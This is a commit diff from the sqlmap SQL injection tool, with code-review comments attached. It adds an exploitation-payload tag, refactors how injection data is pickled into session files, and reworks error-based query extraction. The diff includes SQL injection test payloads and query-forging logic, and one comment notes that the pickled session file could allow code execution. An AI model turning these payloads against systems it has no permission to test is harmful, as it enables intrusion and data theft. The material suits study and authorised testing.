Added tag <epayload> to the payloads.xml's <test> tag to define which payload to use when exploiting the test type.
Removed some useless tests. Moved <error> from queries.xml to payloads.xml as it makes more sense there. Beeps when a SQL injection is found only if --beep is provided. Minor fix to make advancedDict() objects picklable. Minor code refactoring. Removed useless folders.
parent
c00ea7f5e5
commit
089c16a1b8
|
@ -33,6 +33,7 @@ from lib.core.datatype import injectionDict
|
||||||
from lib.core.enums import HTTPMETHOD
|
from lib.core.enums import HTTPMETHOD
|
||||||
from lib.core.enums import NULLCONNECTION
|
from lib.core.enums import NULLCONNECTION
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
|
from lib.core.enums import PLACE
|
||||||
from lib.core.exception import sqlmapConnectionException
|
from lib.core.exception import sqlmapConnectionException
|
||||||
from lib.core.exception import sqlmapGenericException
|
from lib.core.exception import sqlmapGenericException
|
||||||
from lib.core.exception import sqlmapNoneDataException
|
from lib.core.exception import sqlmapNoneDataException
|
||||||
|
@ -331,14 +332,28 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Feed with the boundaries details only the first time a
|
# Feed with the boundaries details only the first time a
|
||||||
# test has been successful
|
# test has been successful
|
||||||
if injection.place is None or injection.parameter is None:
|
if injection.place is None or injection.parameter is None:
|
||||||
|
if place == PLACE.UA:
|
||||||
|
injection.parameter = conf.agent
|
||||||
|
else:
|
||||||
|
injection.parameter = parameter
|
||||||
|
|
||||||
injection.place = place
|
injection.place = place
|
||||||
injection.parameter = parameter
|
|
||||||
injection.ptype = ptype
|
injection.ptype = ptype
|
||||||
injection.prefix = prefix
|
injection.prefix = prefix
|
||||||
injection.suffix = suffix
|
injection.suffix = suffix
|
||||||
|
|
||||||
|
if "epayload" in test:
|
||||||
|
epayload = "%s%s" % (test.epayload, comment)
|
||||||
|
else:
|
||||||
|
epayload = None
|
||||||
|
|
||||||
# Feed with test details every time a test is successful
|
# Feed with test details every time a test is successful
|
||||||
injection.data[stype] = (title, agent.removePayloadDelimiters(reqPayload, False), where, comment)
|
injection.data[stype] = advancedDict()
|
||||||
|
injection.data[stype].title = title
|
||||||
|
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
|
||||||
|
injection.data[stype].where = where
|
||||||
|
injection.data[stype].epayload = epayload
|
||||||
|
injection.data[stype].comment = comment
|
||||||
|
|
||||||
if "details" in test:
|
if "details" in test:
|
||||||
for detailKey, detailValue in test.details.items():
|
for detailKey, detailValue in test.details.items():
|
||||||
|
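Review bot: `epayload = "%s%s" % (test.epayload, comment)` appends `comment` through string formatting, so if `comment` (set outside this hunk) can be None the literal text `None` ends up in the stored exploitation payload; `epayload = "%s%s" % (test.epayload, comment or "")` keeps the payload clean in that case. The `<epayload>` text also carries its own `%s` placeholder, which the errorUse hunk later fills with `safeStringFormat`, so a one-line comment here noting that the placeholder has to survive this concatenation would help the next maintainer. checkSqlInjection begins and ends outside this hunk.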
@ -351,7 +366,8 @@ def checkSqlInjection(place, parameter, value):
|
||||||
elif detailKey == "os" and injection.os is None:
|
elif detailKey == "os" and injection.os is None:
|
||||||
injection.os = detailValue
|
injection.os = detailValue
|
||||||
|
|
||||||
beep()
|
if conf.beep:
|
||||||
|
beep()
|
||||||
|
|
||||||
# There is no need to perform this test for other
|
# There is no need to perform this test for other
|
||||||
# <where> tags
|
# <where> tags
|
||||||
|
@ -703,7 +719,6 @@ def checkConnection(suppressOutput=False):
|
||||||
try:
|
try:
|
||||||
page, _ = Request.queryPage(content=True)
|
page, _ = Request.queryPage(content=True)
|
||||||
conf.seqMatcher.set_seq1(page)
|
conf.seqMatcher.set_seq1(page)
|
||||||
|
|
||||||
except sqlmapConnectionException, errMsg:
|
except sqlmapConnectionException, errMsg:
|
||||||
errMsg = getUnicode(errMsg)
|
errMsg = getUnicode(errMsg)
|
||||||
raise sqlmapConnectionException, errMsg
|
raise sqlmapConnectionException, errMsg
|
||||||
|
|
|
@ -107,10 +107,9 @@ def __formatInjection(inj):
|
||||||
data += "Parameter: %s\n" % inj.parameter
|
data += "Parameter: %s\n" % inj.parameter
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
for stype, sdata in inj.data.items():
|
||||||
stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype
|
|
||||||
data += " Type: %s\n" % stype
|
data += " Type: %s\n" % stype
|
||||||
data += " Title: %s\n" % sdata[0]
|
data += " Title: %s\n" % sdata.title
|
||||||
data += " Payload: %s\n\n" % sdata[1]
|
data += " Payload: %s\n\n" % sdata.payload
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
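Review bot: Dropping `stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype` means the ` Type: %s` line now prints whatever key `inj.data` uses; since the checkSqlInjection hunk stores entries under the integer `stype` and the resume path now unpickles that same object, the report would show a number instead of the technique name. If that is the case, `data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]` restores the readable label. __formatInjection starts outside this hunk.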
@ -136,7 +135,7 @@ def __saveToSessionFile():
|
||||||
parameter = inj.parameter
|
parameter = inj.parameter
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
for stype, sdata in inj.data.items():
|
||||||
payload = sdata[1]
|
payload = sdata.payload
|
||||||
|
|
||||||
if stype == 1:
|
if stype == 1:
|
||||||
kb.booleanTest = payload
|
kb.booleanTest = payload
|
||||||
|
@ -303,7 +302,8 @@ def start():
|
||||||
# TODO: consider the following line in __setRequestParams()
|
# TODO: consider the following line in __setRequestParams()
|
||||||
__testableParameters = True
|
__testableParameters = True
|
||||||
|
|
||||||
if not kb.injection.place or not kb.injection.parameter:
|
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
||||||
|
and (kb.injection.place is None or kb.injection.parameter is None):
|
||||||
if not conf.string and not conf.regexp and not conf.eRegexp:
|
if not conf.string and not conf.regexp and not conf.eRegexp:
|
||||||
# NOTE: this is not needed anymore, leaving only to display
|
# NOTE: this is not needed anymore, leaving only to display
|
||||||
# a warning message to the user in case the page is not stable
|
# a warning message to the user in case the page is not stable
|
||||||
|
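Review bot: The new two-line condition mixes `len(kb.injections) == 0`, a nested `len(...) == 1 and ...[0].place is None` test and the old place/parameter check in one expression, which is hard to verify at a glance. Naming the halves first, `noResumed = not kb.injections or (len(kb.injections) == 1 and kb.injections[0].place is None)` and `noCurrent = kb.injection.place is None or kb.injection.parameter is None`, then `if noResumed and noCurrent:`, reads more easily and documents why a resumed entry without a place still counts as nothing found. start() extends beyond this hunk.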
@ -394,7 +394,7 @@ def start():
|
||||||
__showInjections()
|
__showInjections()
|
||||||
__selectInjection()
|
__selectInjection()
|
||||||
|
|
||||||
if kb.injection.place and kb.injection.parameter:
|
if kb.injection.place is not None and kb.injection.parameter is not None:
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
message = "do you want to exploit this SQL injection? [Y/n] "
|
message = "do you want to exploit this SQL injection? [Y/n] "
|
||||||
exploit = readInput(message, default="Y")
|
exploit = readInput(message, default="Y")
|
||||||
|
|
|
@ -158,6 +158,9 @@ class Agent:
|
||||||
return string
|
return string
|
||||||
|
|
||||||
def cleanupPayload(self, payload):
|
def cleanupPayload(self, payload):
|
||||||
|
if payload is None:
|
||||||
|
return
|
||||||
|
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
randInt1 = randomInt()
|
randInt1 = randomInt()
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
|
|
|
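Review bot: The new early `return` in cleanupPayload hands a None payload back as None implicitly, and the errorUse hunk in this commit passes that result straight into `agent.prefixQuery`; writing it as `return None` and adding a docstring that states the contract, e.g. "Return payload with its random placeholders substituted (presumably via the randInt/randStr values below); None is passed through unchanged", makes the behaviour explicit. The substitution itself lies beyond this hunk, so the docstring wording should be checked against the rest of the method.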
@ -37,7 +37,7 @@ class advancedDict(dict):
|
||||||
try:
|
try:
|
||||||
return self.__getitem__(item)
|
return self.__getitem__(item)
|
||||||
except KeyError:
|
except KeyError:
|
||||||
raise sqlmapDataException, "Unable to access item '%s'" % item
|
raise sqlmapDataException, "unable to access item '%s'" % item
|
||||||
|
|
||||||
def __setattr__(self, item, value):
|
def __setattr__(self, item, value):
|
||||||
"""
|
"""
|
||||||
|
@ -56,6 +56,12 @@ class advancedDict(dict):
|
||||||
else:
|
else:
|
||||||
self.__setitem__(item, value)
|
self.__setitem__(item, value)
|
||||||
|
|
||||||
|
def __getstate__(self):
|
||||||
|
return self.__dict__
|
||||||
|
|
||||||
|
def __setstate__(self, dict):
|
||||||
|
self.__dict__ = dict
|
||||||
|
|
||||||
def injectionDict():
|
def injectionDict():
|
||||||
injection = advancedDict()
|
injection = advancedDict()
|
||||||
|
|
||||||
|
|
|
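Review bot: `def __setstate__(self, dict):` names its parameter after the builtin `dict`, shadowing it inside the method; `def __setstate__(self, state):` with `self.__dict__ = state` avoids that. A one-line comment on `__getstate__` explaining why it exists would also help: `__getattr__` above raises sqlmapDataException rather than AttributeError for unknown names, which is presumably why pickle's lookup of this hook failed before, and the same would apply to any other protocol hook looked up via getattr (for example `__deepcopy__`) if the class is ever copied that way.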
@ -12,6 +12,8 @@ import re
|
||||||
from lib.core.common import dataToSessionFile
|
from lib.core.common import dataToSessionFile
|
||||||
from lib.core.common import formatFingerprintString
|
from lib.core.common import formatFingerprintString
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
|
from lib.core.convert import base64pickle
|
||||||
|
from lib.core.convert import base64unpickle
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
@ -78,30 +80,15 @@ def setInjection(inj):
|
||||||
session file.
|
session file.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if inj.place == PLACE.UA:
|
|
||||||
inj.parameter = conf.agent
|
|
||||||
|
|
||||||
condition = (
|
condition = (
|
||||||
( not kb.resumedQueries
|
( not kb.resumedQueries
|
||||||
or ( kb.resumedQueries.has_key(conf.url) and
|
or ( kb.resumedQueries.has_key(conf.url) and
|
||||||
( not kb.resumedQueries[conf.url].has_key("Injection point")
|
not kb.resumedQueries[conf.url].has_key("Injection data")
|
||||||
or not kb.resumedQueries[conf.url].has_key("Injection parameter")
|
) )
|
||||||
) ) )
|
|
||||||
)
|
)
|
||||||
|
|
||||||
if condition:
|
if condition:
|
||||||
dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.place))
|
dataToSessionFile("[%s][%s][%s][Injection data][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), base64pickle(inj)))
|
||||||
dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.parameter))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection parameter type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.PARAMETER[inj.ptype]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection prefix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.prefix))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection suffix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.suffix))
|
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.SQLINJECTION[stype]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection title][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[0]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection payload][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[1]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection where][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[2]))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection comment][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[3]))
|
|
||||||
|
|
||||||
def setDbms(dbms):
|
def setDbms(dbms):
|
||||||
"""
|
"""
|
||||||
|
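Review bot: The rebuilt `condition` still uses `dict.has_key` and four levels of parentheses for what is a two-clause test; `resumed = kb.resumedQueries.get(conf.url)` followed by `if not resumed or "Injection data" not in resumed:` says the same thing in two lines (both `in` and `dict.get` exist on the Python 2 this file targets, as the `except X, errMsg` syntax elsewhere in the diff shows). Since the `PLACE.UA` override was moved out of here into checkSqlInjection, setInjection's docstring (which starts outside this hunk) could note that `inj.parameter` must already be final when the object is pickled.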
@ -370,96 +357,11 @@ def resumeConfKb(expression, url, value):
|
||||||
except ValueError:
|
except ValueError:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
elif expression == "Injection point" and url == conf.url:
|
elif expression == "Injection data" and url == conf.url:
|
||||||
injPlace = value[:-1]
|
injection = base64unpickle(value[:-1])
|
||||||
|
kb.injections.append(injection)
|
||||||
|
|
||||||
logMsg = "resuming injection point '%s' from session file" % injPlace
|
logMsg = "resuming injection data"
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
if not conf.paramDict.has_key(injPlace):
|
|
||||||
warnMsg = "none of the parameters you provided "
|
|
||||||
warnMsg += "matches the resumable injection point. "
|
|
||||||
warnMsg += "sqlmap is going to reidentify the "
|
|
||||||
warnMsg += "injectable point"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
if kb.injection.place is not None and kb.injection.parameter is not None:
|
|
||||||
kb.injections.append(kb.injection)
|
|
||||||
kb.injection = injectionDict()
|
|
||||||
|
|
||||||
kb.injection.place = injPlace
|
|
||||||
|
|
||||||
elif expression == "Injection parameter" and url == conf.url:
|
|
||||||
injParameter = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection parameter '%s' from session file" % injParameter
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
not conf.paramDict.has_key(kb.injection.place) or
|
|
||||||
not conf.paramDict[kb.injection.place].has_key(injParameter)
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
warnMsg = "none of the parameters you provided "
|
|
||||||
warnMsg += "matches the resumable injection parameter. "
|
|
||||||
warnMsg += "sqlmap is going to reidentify the "
|
|
||||||
warnMsg += "injectable point"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
kb.injection.parameter = injParameter
|
|
||||||
|
|
||||||
elif expression == "Injection parameter type" and url == conf.url:
|
|
||||||
kb.injection.ptype = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection parameter type '%s' from session file" % kb.injection.ptype
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection prefix" and url == conf.url:
|
|
||||||
kb.injection.prefix = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection prefix '%s' from session file" % kb.injection.prefix
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection suffix" and url == conf.url:
|
|
||||||
kb.injection.suffix = unSafeFormatString(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming injection suffix '%s' from session file" % kb.injection.suffix
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection type" and url == conf.url:
|
|
||||||
stype = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[stype] = []
|
|
||||||
|
|
||||||
logMsg = "resuming injection type '%s' from session file" % stype
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection title" and url == conf.url:
|
|
||||||
title = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(title)
|
|
||||||
|
|
||||||
logMsg = "resuming injection title '%s' from session file" % title
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection payload" and url == conf.url:
|
|
||||||
payload = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(payload)
|
|
||||||
|
|
||||||
logMsg = "resuming injection payload '%s' from session file" % payload
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection where" and url == conf.url:
|
|
||||||
where = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(where)
|
|
||||||
|
|
||||||
logMsg = "resuming injection where '%s' from session file" % where
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Injection comment" and url == conf.url:
|
|
||||||
comment = unSafeFormatString(value[:-1])
|
|
||||||
kb.injection.data[kb.injection.data.keys()[0]].append(comment)
|
|
||||||
|
|
||||||
logMsg = "resuming injection comment '%s' from session file" % comment
|
|
||||||
logger.info(logMsg)
|
logger.info(logMsg)
|
||||||
|
|
||||||
elif expression == "Boolean-based blind injection" and url == conf.url:
|
elif expression == "Boolean-based blind injection" and url == conf.url:
|
||||||
|
|
|
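Review bot: `injection = base64unpickle(value[:-1])` followed by `kb.injections.append(injection)` accepts the resumed entry unconditionally, whereas the removed code checked the place and parameter against `conf.paramDict` and warned when they no longer matched the current request; without that check a session resumed against a target whose parameters changed carries a stale injection point into start(). Keeping a reduced form before the append, `if injection.place not in conf.paramDict or injection.parameter not in conf.paramDict.get(injection.place, {}): logger.warn("resumed injection point does not match the provided parameters")`, preserves the old behaviour. Separately, the session file is now a pickle source: anyone who can write to it can run arbitrary code inside the sqlmap process when the session is resumed, so a comment here about the trust placed in that file and at least an `isinstance(injection, advancedDict)` check on the unpickled object before it is used are warranted. resumeConfKb begins and ends outside this hunk.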
@ -14,6 +14,9 @@ from lib.core.data import paths
|
||||||
from lib.core.datatype import advancedDict
|
from lib.core.datatype import advancedDict
|
||||||
|
|
||||||
def cleanupVals(values, tag):
|
def cleanupVals(values, tag):
|
||||||
|
if isinstance(values, basestring):
|
||||||
|
return values
|
||||||
|
|
||||||
count = 0
|
count = 0
|
||||||
|
|
||||||
for value in values:
|
for value in values:
|
||||||
|
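Review bot: The new `if isinstance(values, basestring): return values` guard turns cleanupVals from a list-only helper into one that passes a bare string through, but nothing records that; a docstring such as "Normalise the comma-split values of tag; a plain string (the <epayload> text) is returned untouched" would state the intent, and it is worth noting that `tag` is ignored on that path. The loop that follows runs past the end of this hunk.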
@ -48,7 +51,7 @@ def parseXmlNode(node):
|
||||||
|
|
||||||
for child in element.getchildren():
|
for child in element.getchildren():
|
||||||
if child.text and child.text.strip():
|
if child.text and child.text.strip():
|
||||||
values = cleanupVals(child.text.split(','), child.tag)
|
values = cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)
|
||||||
test[child.tag] = values
|
test[child.tag] = values
|
||||||
else:
|
else:
|
||||||
if len(child.getchildren()) == 0:
|
if len(child.getchildren()) == 0:
|
||||||
|
|
|
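Review bot: `cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)` buries the tag-specific rule in a conditional expression inside the call; hoisting it, `raw = child.text if child.tag == "epayload" else child.text.split(',')` then `values = cleanupVals(raw, child.tag)`, reads more clearly. Since cleanupVals (earlier hunk of this file) already returns strings unchanged, the tag check could alternatively move into that helper so the set of tags that must not be comma-split lives in one place. parseXmlNode continues outside the hunk.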
@ -401,8 +401,8 @@ def goStacked(expression, silent=False):
|
||||||
return direct(expression), None
|
return direct(expression), None
|
||||||
|
|
||||||
comment = queries[kb.dbms].comment.query
|
comment = queries[kb.dbms].comment.query
|
||||||
query = agent.prefixQuery("; %s" % expression)
|
query = agent.prefixQuery("; %s" % expression)
|
||||||
query = agent.suffixQuery("%s;%s" % (query, comment))
|
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||||
|
|
||||||
debugMsg = "query: %s" % query
|
debugMsg = "query: %s" % query
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
@ -412,7 +412,7 @@ def goStacked(expression, silent=False):
|
||||||
|
|
||||||
return payload, page
|
return payload, page
|
||||||
|
|
||||||
def goError(expression, suppressOutput=False, returnPayload=False):
|
def goError(expression, suppressOutput=False):
|
||||||
"""
|
"""
|
||||||
Retrieve the output of a SQL query taking advantage of an error-based
|
Retrieve the output of a SQL query taking advantage of an error-based
|
||||||
SQL injection vulnerability on the affected parameter.
|
SQL injection vulnerability on the affected parameter.
|
||||||
|
@ -436,10 +436,8 @@ def goError(expression, suppressOutput=False, returnPayload=False):
|
||||||
result = resume(expression, None)
|
result = resume(expression, None)
|
||||||
|
|
||||||
if not result:
|
if not result:
|
||||||
result = errorUse(expression, returnPayload)
|
result = errorUse(expression)
|
||||||
|
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
|
||||||
if not returnPayload:
|
|
||||||
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
|
|
||||||
|
|
||||||
if suppressOutput:
|
if suppressOutput:
|
||||||
conf.verbose = popValue()
|
conf.verbose = popValue()
|
||||||
|
|
|
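Review bot: Dropping the `returnPayload` keyword from goError (and from errorUse in the later hunk) is a signature change: any caller still passing `returnPayload=True` will fail with a TypeError at call time rather than at import, so the remaining call sites should be checked as part of this commit. The `dataToSessionFile(...)` line is now reached whenever `result` was freshly computed, including when errorUse returned None, in which case `replaceNewlineTabs(result)` receives None as it already could before; an `if result is not None:` guard would make that path explicit unless the helper handles None itself. goError continues outside this hunk.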
@ -28,45 +28,37 @@ from lib.utils.resume import resume
|
||||||
from lib.core.settings import ERROR_SPACE
|
from lib.core.settings import ERROR_SPACE
|
||||||
from lib.core.settings import ERROR_EMPTY_CHAR
|
from lib.core.settings import ERROR_EMPTY_CHAR
|
||||||
|
|
||||||
def errorUse(expression, returnPayload=False):
|
def errorUse(expression):
|
||||||
"""
|
"""
|
||||||
Retrieve the output of a SQL query taking advantage of an error SQL
|
Retrieve the output of a SQL query taking advantage of an error SQL
|
||||||
injection vulnerability on the affected parameter.
|
injection vulnerability on the affected parameter.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
output = None
|
output = None
|
||||||
logic = conf.logic
|
randInt = randomInt(1)
|
||||||
randInt = randomInt(1)
|
query = agent.cleanupPayload(kb.injection.data[2].epayload)
|
||||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
query = agent.prefixQuery(query)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
startLimiter = ""
|
check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
|
||||||
endLimiter = ""
|
|
||||||
|
|
||||||
expressionUnescaped = expression
|
expressionUnescaped = expression
|
||||||
|
|
||||||
if kb.dbmsDetected:
|
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
||||||
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
|
||||||
|
|
||||||
if kb.dbms == DBMS.MYSQL:
|
if kb.dbms == DBMS.MYSQL:
|
||||||
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
||||||
|
|
||||||
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||||
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
expression = safeStringFormat(query, expression)
|
||||||
startLimiter = unescaper.unescape("'%s'" % kb.misc.start)
|
expression = unescaper.unescape(expression)
|
||||||
endLimiter = unescaper.unescape("'%s'" % kb.misc.stop)
|
|
||||||
else:
|
|
||||||
expressionUnescaped = kb.misc.handler.unescape(expression)
|
|
||||||
startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start)
|
|
||||||
endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
|
|
||||||
|
|
||||||
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
|
debugMsg = "query: %s" % expression
|
||||||
debugMsg = "query: %s" % forgedQuery
|
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
payload = agent.payload(newValue=forgedQuery)
|
payload = agent.payload(newValue=expression)
|
||||||
result = Request.queryPage(payload, content=True)
|
reqBody, _ = Request.queryPage(payload, content=True)
|
||||||
match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE)
|
match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
|
||||||
|
|
||||||
if match:
|
if match:
|
||||||
output = match.group('result')
|
output = match.group('result')
|
||||||
|
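Review bot: On the new side `randInt = randomInt(1)` and `expressionUnescaped = expression` are assigned but never read within this hunk (the old code used both in `forgedQuery`), so they are dead unless the part of errorUse after the hunk uses them, and dropping them avoids suggesting the query is still randomised. `kb.injection.data[2].epayload` hard-codes the error-based technique key, and when the matching test had no `<epayload>` the stored value is None (see the checkSqlInjection hunk), which then flows through `agent.cleanupPayload` into `agent.prefixQuery`; a named constant for the key plus an explicit guard that raises a descriptive sqlmap exception when `query is None` would fail clearly instead. Finally, `check` interpolates `kb.misc.start` and `kb.misc.stop` into a regular expression unescaped, so `re.escape()` on both keeps the search correct if those markers ever contain metacharacters. errorUse continues outside this hunk.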
@ -78,7 +70,4 @@ def errorUse(expression, returnPayload=False):
|
||||||
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if returnPayload:
|
return output
|
||||||
return output, payload
|
|
||||||
else:
|
|
||||||
return output
|
|
||||||
|
|
|
@ -1,10 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
"""
|
|
||||||
$Id$
|
|
||||||
|
|
||||||
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
||||||
See the file 'doc/COPYING' for copying permission
|
|
||||||
"""
|
|
||||||
|
|
||||||
pass
|
|
|
@ -126,6 +126,9 @@ Tag: <test>
|
||||||
original value to its negative representation
|
original value to its negative representation
|
||||||
3: Replace the parameter original value
|
3: Replace the parameter original value
|
||||||
|
|
||||||
|
Sub-tag: <epayload>
|
||||||
|
The payload that will be used to exploit the injection point.
|
||||||
|
|
||||||
Sub-tag: <request>
|
Sub-tag: <request>
|
||||||
What to inject for this test.
|
What to inject for this test.
|
||||||
|
|
||||||
|
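Review bot: The new `<epayload>` description says only that it is the payload used to exploit the injection point; the entries further down show its text carries a `%s` placeholder for the query to retrieve and that the tag is optional (empty `<epayload></epayload>` tags are used where no exploitation payload exists and the parser skips empty text), and neither fact is stated here. A line such as "Optional. Use %s where the query to be retrieved is substituted; unlike other sub-tags, the text is taken verbatim and not split on commas" would cover it, and the verbatim handling matches the parseXmlNode change in this commit.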
@ -187,6 +190,7 @@ Formats:
|
||||||
<risk></risk>
|
<risk></risk>
|
||||||
<clause></clause>
|
<clause></clause>
|
||||||
<where></where>
|
<where></where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload></payload>
|
<payload></payload>
|
||||||
<comment></comment>
|
<comment></comment>
|
||||||
|
@ -403,6 +407,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -418,6 +423,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -436,6 +442,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -455,6 +462,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
